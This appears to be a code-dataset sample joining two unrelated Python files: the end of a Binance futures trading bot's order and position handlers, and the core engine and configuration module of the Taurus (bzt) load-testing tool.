SM_total, SM_quantity, SM_average_price,
self.current_position_dict[prefix_id]['comission'],
profit,
utc_2_datetime(int(prefix_id)/1000),
current_date_time(),
self.margin)
put_to_log(log_string, self.__profit_log_path)
print(log_string)
del self.current_position_dict[prefix_id]
else:
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
else:
print("\n====================================================================\nReceived an user order:")
PrintMix.print_data(first_order)
put_to_log('\n\nUser order:\n{}\n'.format(convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================\n")
except Exception as e:
log = "\n\n{}\nAn ERROR happend in position handler function: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_status_handler(self):
'''
NEW
PARTIALLY_FILLED 部分成交
FILLED 成交
CANCELED 已撤
CALCULATED
EXPIRED 订单失效
TRADE 交易
'''
while True:
try:
current_order_status = None if self.position_status.order_status == None else self.position_status.order_status.upper()
if (current_order_status == 'FILLED'):
time.sleep(0.05)
if ((self.position_status.position_object.amount == 0) and ((current_order_status =='FILLED'))):
# Position finished successfully, reset
self.position_status = positionStatus(self.__paried_symbol)
print('Position finished!:\nPosition status reset!')
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='FILLED'))):
# Order finished successfully, reset order, handle/monitor position
pass
elif (current_order_status == 'CANCELED'):
time.sleep(0.05)
if ((self.position_status.position_object.amount== 0) and ((current_order_status =='CANCELED'))):
# Position finished unexpectively, reset
self.position_status = positionStatus(self.__paried_symbol)
print('Order was canceled, but position finished: \nPosition status reset!\n')
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='CANCELED'))):
# Order canceled, handle/monitor position
pass
elif (current_order_status == 'NEW'):
time.sleep(0.05)
if ((self.position_status.position_object.amount == 0) and ((current_order_status =='NEW'))):
# Order waiting to be filled to position
pass
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='NEW'))):
# Order created, handle/monitor position
print("Order is created to handle the corresponding position!")
elif (current_order_status == 'EXPIRED'):
time.sleep(0.05)
if ((self.position_status.position_object.amount == 0) and ((current_order_status =='EXPIRED'))):
# Position finished unexpectively, Reset
pass
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='EXPIRED'))):
# Order finished successfully, reset order, handle/monitor position
pass
elif ((current_order_status == None) and (self.position_status.position_object.amount == 0)):
#analyzing
time.sleep(1)
# print('This is not finished yet!', self.kline_info['kline_list']['close_price_list'][-4:])
pass
elif (current_order_status == 'PARTIALLY_FILLED'):
pass
elif (current_order_status == 'CALCULATED'):
pass
elif (current_order_status == 'TRADE'):
pass
# else:
# raise Exception("\nUnkown error happened while handlling position: invalid position status: {}".format(self.position_status.order_status))
except Exception as e:
log = "\n\n{}\nAn ERROR happend while handling position status: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def order_handler(self):
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
}
'''
while True:
try:
for clientID in self.current_position_dict.keys():
clientOrderID = clientID + OrderSide.BUY + "_" + self.current_position_dict[clientID]['positionSide']
if ( ( ( int(time.time())*1000 - int(clientID[:13] ) ) > self.__order_timeout) and ( self.current_position_dict[clientID]['entryPrice'] == None ) ):
result = None
try:
result = self.client.futures_cancel_order(origClientOrderId = clientOrderID, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the timeout order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
if result!= None:
if result.status.upper() == 'CANCELED':
del self.current_position_dict[clientID]
else:
raise Exception("\n\nTimeout order: {} was not successfully canceled.".format(clientID))
if ( ( ( self.__acc_profit + self.__starting_asset_value) < 8) and ( len(self.current_position_dict) == 0 ) ):
print('\n\nNot enough balance: {}\n\n'.format( self.__acc_profit + self.__starting_asset_value))
time.sleep(3)
if len(self.current_position_dict) <2:
recom = self.current_recommendation.copy()
if len(self.current_position_dict) == 1:
pass
# # Uncomment the following if both long and short can exist
# current_position_clientOrderId = list(self.current_position_dict.keys())[0]
# current_position_side = self.current_position_dict[current_position_clientOrderId]['positionSide']
# opoPositionSide = PositionSide.SHORT if current_position_side.upper() == PositionSide.LONG else PositionSide.SHORT
# if recom[opoPositionSide.lower()]['level'] > 0:
# rec_price = recom[opoPositionSide.lower()]['price']
# quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
# positionSide = opoPositionSide.lower()
# level = recom[opoPositionSide.lower()]['level']
# uniqueOrderId = str(int(current_utc_time())*1000)
# self.place_limit_buy(positionSide, level, quantity, rec_price, uniqueOrderId)
# time.sleep(0.2)
elif len(self.current_position_dict) == 0:
if (recom['short']['level'] > 0 or recom['long']['level'] > 0):
if recom['short']['level'] > 0:
posisionSide = 'short'
elif recom['long']['level'] > 0:
posisionSide = 'long'
if (posisionSide == 'long' or posisionSide == 'short'):
rec_price = recom[posisionSide.lower()]['price']
quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
level = recom[posisionSide.lower()]['level']
uniqueOrderId = str(int(current_utc_time())*1000)
self.place_limit_buy(posisionSide, level, quantity, rec_price, uniqueOrderId)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while handling an order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def place_limit_buy(self, positionSide, level, quantity, price, uniqueOrderId):
try:
self.client.futures_create_order(symbol = self.__paried_symbol,
side=(OrderSide.BUY if positionSide.lower() == "long" else OrderSide.SELL),
type=OrderType.LIMIT,
positionSide=positionSide.upper(),
timeInForce = TimeInForce.GTC,
quantity =quantity,
price = round((price * (1.0003 if positionSide.lower() == "long" else 0.9997)), 2),
newClientOrderId=uniqueOrderId + OrderSide.BUY + "_" + positionSide
)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while placing a limit order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
self.current_position_dict[uniqueOrderId] = {
'uniqueOrderId': uniqueOrderId,
'level': level,
'positionSide': positionSide,
'trigeredPrice': price,
'entryPrice': None,
'exitPrice': None,
'quantity': 0,
'relatedOrderID': {},
'comission': 0
}
def cancele_order(self, clientOrderId):
pass
def run(self):
'''
https://www.itranslater.com/qa/details/2583623258847314944
'''
pre_task_finished = self.make_dir()
if pre_task_finished:
self.update_config_info()
t1 = threading.Thread(target=self.start_subscribing)
t2 = threading.Thread(target=self.start_analysing)
t3 = threading.Thread(target=self.start_handler)
t4 = threading.Thread(target=self.check_if_service_avaliable)
task_list = [t1, t2, t3, t4]
for task in task_list:
task.start()
for task in task_list:
task.join()
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import hashlib
import json
import logging
import math
import os
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from abc import abstractmethod
from collections import namedtuple, defaultdict
from distutils.version import LooseVersion
from json import encoder
import yaml
from yaml.representer import SafeRepresenter
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException, InvalidTaurusConfiguration
from bzt.requests_model import RequestParser
from bzt.six import numeric_types
from bzt.six import string_types, text_type, PY2, UserDict, parse, reraise
from bzt.utils import PIPE, shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient
from bzt.utils import load_class, to_json, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import str_representer, Environment, RequiredTool, RESOURCES_DIR
TAURUS_ARTIFACTS_DIR = "TAURUS_ARTIFACTS_DIR"
SETTINGS = "settings"
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log, dict(os.environ))
self.shared_env = Environment(self.log)
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def _generate_id(self):
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, cwd, stdout, stderr, stdin, shell, env):
if cwd is None:
cwd = self.default_cwd
env = Environment(self.log, env.get())
env.set(self.shared_env.get())
return shell_exec(args, cwd=cwd, stdout=stdout, stderr=stderr, stdin=stdin, shell=shell, env=env.get())
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
self.stopping_reason = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_info:
exc_info = sys.exc_info()
if not exc_value:
exc_value = exc
if exc_info:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not exc_info:
exc_info = sys.exc_info()
if not exc_value:
exc_value = exc
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_info:
exc_info = sys.exc_info()
if not exc_value:
exc_value = exc
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
self.env.set({TAURUS_ARTIFACTS_DIR: self.artifacts_dir})
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
base_configs = [os.path.join(RESOURCES_DIR, 'base-config.yml')]
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading extension configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
base_configs.append(fname)
else:
self.log.debug("No machine configs dir: %s", machine_dir)
self.log.debug("Base configs list: %s", base_configs)
self.config.load(base_configs)
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
reporter = ensure_is_dict(reporting, index, "module")
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
config = ensure_is_dict(srv_config, index, "module")
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can be only used once, will merge all new instances into single"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "http://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
self.env.set({varname: envs[varname]})
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
class Configuration(BetterDict):
"""
loading both JSONs and YAMLs and .properties-like override
dump effective config into files
first config should not contain action prefixes
"""
JSON = "JSON"
YAML = "YAML"
def __init__(self, *args, **kwargs):
super(Configuration, self).__init__(*args, **kwargs)
self.log = logging.getLogger('')
self.dump_filename = None
self.tab_replacement_spaces = 0
self.warn_on_tab_replacement = True
def load(self, config_files, callback=None):
"""
Load and merge JSON/YAML files into current dict
:type callback: callable
:type config_files: list[str]
"""
self.log.debug("Configs: %s", config_files)
for config_file in config_files:
try:
configs = []
with codecs.open(config_file, 'r', encoding='utf-8') as fds:
if self.tab_replacement_spaces:
contents = self._replace_tabs(fds.readlines(), config_file)
else:
contents = fds.read()
self._read_yaml_or_json(config_file, configs, contents)
for config in configs:
self.merge(config)
except KeyboardInterrupt:
raise
except InvalidTaurusConfiguration:
raise
except BaseException as exc:
raise TaurusConfigError("Error when reading config file '%s': %s" % (config_file, exc))
if callback is not None:
callback(config_file)
def _read_yaml_or_json(self, config_file, configs, contents):
try:
self.log.debug("Reading %s as YAML", config_file)
yaml_documents = list(yaml.load_all(contents))
for doc in yaml_documents:
if doc is None:
continue
if not isinstance(doc, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(doc)
except KeyboardInterrupt:
raise
except BaseException as yaml_load_exc:
self.log.debug("Cannot read config file as YAML '%s': %s", config_file, yaml_load_exc)
if contents.lstrip().startswith('{'):
self.log.debug("Reading %s as JSON", config_file)
config_value = json.loads(contents)
if not isinstance(config_value, dict):
raise InvalidTaurusConfiguration("Configuration %s in invalid" % config_file)
configs.append(config_value)
else:
raise
def set_dump_file(self, filename):
"""
Set default file and format to be used by `dump` method
:type filename: str
"""
self.dump_filename = filename
def write(self, fds, fmt):
"""
Write config into opened file
:type fds: file
:type fmt: str
:raise TaurusInternalException:
"""
if fmt == self.JSON:
json_s = to_json(self)
fds.write(json_s.encode('utf-8'))
elif fmt == self.YAML:
yml = yaml.dump(self, default_flow_style=False, explicit_start=True, canonical=False, allow_unicode=True,
encoding='utf-8', width=float("inf"))
fds.write(yml)
else:
raise TaurusInternalException("Unknown dump format: %s" % fmt)
fds.write("\n".encode('utf-8'))
def dump(self, filename=None, fmt=None):
"""
Dump current state of dict into file. If no filename or format
specified, defaults are used
:type filename: str or NoneType
:type fmt: str or NoneType
"""
if not filename:
filename = self.dump_filename
if filename:
if not fmt:
self.dump(filename + ".yml", self.YAML)
self.dump(filename + ".json", self.JSON)
return
acopy = copy.deepcopy(self)
BetterDict.traverse(acopy, self.masq_sensitive)
BetterDict.traverse(acopy, self.replace_infinities)
with open(filename, "wb") as fhd:
self.log.debug("Dumping %s config into %s", fmt, filename)
acopy.write(fhd, fmt)
@staticmethod
def masq_sensitive(value, key, container):
"""
Remove sensitive data from config
"""
if isinstance(key, string_types):
for suffix in ('password', 'secret', 'token',):
if key.lower().endswith(suffix):
if value and isinstance(value, (string_types, text_type)):
container[key] = '*' * 8
@staticmethod
def replace_infinities(value, key, container):
"""
Remove non-string JSON values used by default JSON encoder (Infinity, -Infinity, NaN)
"""
del value
if isinstance(container[key], float):
if math.isinf(container[key]) or math.isnan(container[key]):
container[key] = str(container[key])
def _replace_tabs(self, lines, fname):
has_tab_indents = re.compile("^( *)(\t+)( *\S*)")
res = ""
for num, line in enumerate(lines):
replaced = has_tab_indents.sub(r"\1" + (" " * self.tab_replacement_spaces) + r"\3", line)
if replaced != line:
line = replaced
if self.warn_on_tab_replacement:
self.log.warning("Replaced leading tabs in file %s, line %s", fname, num)
self.log.warning("Line content is: %s", replaced.strip())
self.log.warning("Please remember that YAML spec does not allow using tabs for indentation")
res += line
return res
yaml.add_representer(Configuration, SafeRepresenter.represent_dict)
yaml.add_representer(BetterDict, SafeRepresenter.represent_dict)
if PY2:
yaml.add_representer(text_type, SafeRepresenter.represent_unicode)
yaml.add_representer(str, str_representer)
if PY2:
# dirty hack from http://stackoverflow.com/questions/1447287/format-floats-with-standard-json-module
encoder.FLOAT_REPR = lambda o: format(o, '.3g')
else:
pass # TODO: how to implement it?
class EngineModule(object):
"""
Base class for any BZT engine module
:type engine: Engine
:type settings: BetterDict
"""
def __init__(self):
self.log = logging.getLogger('')
self.engine = None
self.settings = BetterDict()
self.parameters = BetterDict()
def prepare(self):
"""
Preparation stage, at which configuration is being read, configs
and tools being prepared. All long preparations and checks should be
made here, to make `startup` stage as fast as possible.
"""
pass
def startup(self):
"""
Startup should be as fast as possible. Launch background processes,
do some API calls for initiation of actual work. Consider making all
checks and preparations on `prepare` stage.
"""
pass
def check(self):
"""
Check if work should be finished
:rtype: bool
:return: True if should be finished
"""
return False
def shutdown(self):
"""
Stop all processes that were started in `startup` stage.
Should also be as fast as possible, deferring all long operations to
`post_process` stage.
"""
pass
def post_process(self):
"""
Do all possibly long analysis and processing on run results
"""
pass
def _should_run(self):
"""
Returns True if provisioning matches run-at
"""
prov = self.engine.config.get(Provisioning.PROV)
runat = self.parameters.get("run-at", None)
if runat is not None and prov != runat:
self.log.debug("Should not run because of non-matching prov: %s != %s", prov, runat)
return False
return True
class Provisioning(EngineModule):
"""
Base class for any provisioning type. Provisioning is the way to
get the resources that will run the job. For example, local provisoning
means using local machine to run executors, remote means using
remote machines with BZT API nodes on them.
:type executors: list[ScenarioExecutor]
"""
PROV = "provisioning"
def __init__(self):
super(Provisioning, self).__init__()
self.executors = []
self.disallow_empty_execution = True
def prepare(self):
"""
Preparation in provisioning begins with reading executions list
and instantiating ScenarioExecutor classes for them
"""
super(Provisioning, self).prepare()
esettings = self.engine.config.get(SETTINGS)
default_executor = esettings.get("default-executor", None)
exc = TaurusConfigError("No 'execution' is configured. Did you forget to pass config files?")
if ScenarioExecutor.EXEC not in self.engine.config and self.disallow_empty_execution:
raise exc
executions = self.engine.config.get(ScenarioExecutor.EXEC, [])
if not executions and self.disallow_empty_execution:
raise exc
if isinstance(executions, dict):
executions = [executions]
for execution in executions:
executor = execution.get("executor", default_executor)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
instance = self.engine.instantiate_module(executor)
instance.provisioning = self
instance.execution = execution
